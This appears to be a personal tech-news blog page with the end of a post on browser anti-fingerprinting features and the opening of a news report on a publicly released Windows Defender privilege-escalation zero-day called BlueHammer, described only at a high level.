Interestingly, Mozilla Firefox offers some native resistance against fingerprinting with the privacy.resistFingerprinting flag that can be enabled inside about:config. Brave, meanwhile, offers even better privacy protection with its built-in Farbling feature such that it blocks known fingerprinting scripts and randomizes canvas output so it changes every session, even though it displays correctly to the end user. Finally, Microsoft's own Edge also offers more than Google Chrome thanks to its Tracking Prevention feature and can limit fingerprint tracking.

Source: That Privacy Guy

Source

Hope you enjoyed this news post. Feedback welcome.

Posted Saturday 18 April 2026 at 7:35 am AEST (my time).

News posts: 2023 5,800+ | 2024 5,700+ | 2025 5,700+ | 2026 (to end of March) 1,297

RIP Matrix

On April 2, 2026, a security researcher using the name Chaotic Eclipse published a blog post stating that they were "doing it again." Under this warning, a link to a GitHub account page for a user named "Nightmare Eclipse" containing an exploit known as BlueHammer.

BlueHammer, as it turns out, is a zero-day Windows exploit, meaning it was released into the wild ahead of any Microsoft action. BlueHammer has been confirmed to work by Will Dormann, a principal vulnerability analyst at Tharros (via ).

As explained, BlueHammer works by exploiting a local privilege escalation (LPE), time-of-check to time-of-use (TOCTOU), and a path of confusion, breaking down Windows Defender to the point where attackers receive SYSTEM privileges for a complete PC takeover.

It's a nasty little bug, to say the least, and it appears to have been released into the wild due to perceived incompetence on the part of Microsoft's Security Response Center (MSRC).

Microsoft Security Response Center takes the blame; Microsoft responds